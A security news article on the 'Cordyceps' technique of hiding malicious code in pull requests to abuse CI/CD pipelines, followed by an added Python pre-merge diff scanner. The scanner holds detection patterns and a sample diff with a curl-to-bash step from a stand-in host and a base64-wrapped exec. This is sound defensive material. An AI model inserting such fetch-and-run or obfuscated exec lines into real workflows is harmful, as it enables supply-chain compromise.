Security researchers have identified a new attack vector dubbed 'Cordyceps' that exploits CI/CD workflow weaknesses through malicious pull requests. The technique targets multiple high-profile projects including Microsoft's Azure Sentinel, Google's AI Agent Development Kit, Apache's Doris analytics database, Cloudflare's Workers SDK, and the Python Software Foundation's Black formatter.

The attack is rated as highly severe because the affected tools and frameworks are so widely used. While no CVSS score or exact number of compromised systems has been disclosed, the methodology preys on the trust inherent in collaborative development workflows, making it particularly dangerous for open-source ecosystems.

Cordyceps operates by submitting pull requests that appear legitimate but contain hidden malicious code. The technique abuses automation in CI/CD pipelines that may automatically merge or test incoming contributions without thorough review. Indicators of compromise include unexpected code modifications in pull requests and altered build artifacts.

Currently, no specific patches have been released for the underlying vulnerability. Mitigation relies on implementing stricter code review processes, requiring multi-factor authentication for pull request approvals, and deploying automated scanning tools to detect anomalous code changes before merge.
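As an added example, not part of the article and not a description of the Cordyceps payload itself, the following Python script shows the kind of pre-merge scan the mitigation above calls for: it parses a unified diff from a pull request, flags modifications to files that control what the pipeline executes, and flags added lines that match a few heuristics for anomalous content. The path patterns, the content rules, and the two sample diffs are constructed assumptions chosen for illustration; a real deployment would tune them to the project's own layout.

```python
"""Pre-merge diff scanner (added illustrative example, not from the article).

All path patterns, content heuristics and sample diffs below are assumptions
constructed for this example; they do not describe how Cordyceps works.
"""
import re
from dataclasses import dataclass, field

# Files whose modification in an external PR warrants human review because
# they control what CI/CD runs (assumed list for this example).
SENSITIVE_PATH_PATTERNS = [
    re.compile(r"^\.github/workflows/.*\.ya?ml$"),
    re.compile(r"^(\.gitlab-ci\.yml|Jenkinsfile|azure-pipelines\.yml)$"),
    re.compile(r"^(setup\.py|pyproject\.toml|package\.json|Makefile)$"),
]

# Heuristics applied to added ('+') lines only (assumed rules).
SUSPICIOUS_CONTENT = {
    "remote-fetch-exec": re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "base64-decode": re.compile(r"base64\s*(-d|--decode)|b64decode\("),
    "long-opaque-literal": re.compile(r"['\"][A-Za-z0-9+/=]{60,}['\"]"),
    "secret-reference": re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}"),
}

PATH_RE = re.compile(r"^\+\+\+ (?:b/)?(\S+)", re.M)


@dataclass
class Finding:
    path: str
    line_no: int   # line number in the new file; 0 for file-level findings
    rule: str
    text: str


@dataclass
class ScanResult:
    findings: list = field(default_factory=list)

    @property
    def should_block(self) -> bool:
        """Block auto-merge and require a human review if anything was flagged."""
        return bool(self.findings)


def parse_added_lines(diff_text: str):
    """Yield (path, new_line_no, content) for every added line in a unified diff.

    Simplified parser: it assumes git-style headers and ignores rename/binary
    metadata, which is enough for the constructed samples below.
    """
    path = None
    new_line = 0
    for raw in diff_text.splitlines():
        if raw.startswith(("diff ", "index ", "--- ")):
            continue
        if raw.startswith("+++ "):
            path = raw[4:].strip()
            if path.startswith("b/"):
                path = path[2:]
            continue
        if raw.startswith("@@"):
            m = re.search(r"\+(\d+)", raw)
            new_line = int(m.group(1)) if m else 0
            continue
        if path is None:
            continue
        if raw.startswith("+"):
            yield path, new_line, raw[1:]
            new_line += 1
        elif raw.startswith("-"):
            continue  # removed line: does not advance new-file numbering
        else:
            new_line += 1  # context line


def scan_diff(diff_text: str) -> ScanResult:
    """Flag pipeline-controlling file changes and suspicious added content."""
    result = ScanResult()
    for path in PATH_RE.findall(diff_text):
        if any(p.match(path) for p in SENSITIVE_PATH_PATTERNS):
            result.findings.append(
                Finding(path, 0, "sensitive-path", "pipeline-controlling file modified"))
    for path, line_no, added in parse_added_lines(diff_text):
        for rule, pattern in SUSPICIOUS_CONTENT.items():
            if pattern.search(added):
                result.findings.append(Finding(path, line_no, rule, added.strip()))
    return result


# Constructed sample: a PR that edits the CI workflow to pipe a remote script
# into a shell and adds a base64-wrapped exec to application code.
SAMPLE_PR_DIFF = """diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -10,6 +10,8 @@ jobs:
     steps:
       - uses: actions/checkout@v4
+      - name: Fetch toolchain
+        run: curl -sSL https://example.invalid/setup.sh | bash
       - name: Run tests
         run: pytest
       - name: Upload
         run: ./upload.sh
diff --git a/src/util.py b/src/util.py
--- a/src/util.py
+++ b/src/util.py
@@ -1,3 +1,5 @@
 import os
+import base64
+exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
 def helper():
     return os.getcwd()
"""

# Constructed sample: a harmless documentation-only PR.
CLEAN_DIFF = """diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1,2 +1,3 @@
 # Project
+Documentation for the build.
 See docs/.
"""

if __name__ == "__main__":
    for name, diff in (("sample PR", SAMPLE_PR_DIFF), ("clean PR", CLEAN_DIFF)):
        result = scan_diff(diff)
        print(f"{name}: block={result.should_block}")
        for f in result.findings:
            print(f"  {f.path}:{f.line_no} [{f.rule}] {f.text}")
```

Run as a required status check, a non-empty finding list turns auto-merge off for that pull request and routes it to a reviewer; the rules are intentionally coarse so that a false positive costs a human look rather than a silent merge.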

The attack draws its name from the parasitic fungus that controls its host, reflecting how malicious code can hijack trusted development workflows. This technique highlights growing risks in software supply chain security where developer trust is exploited.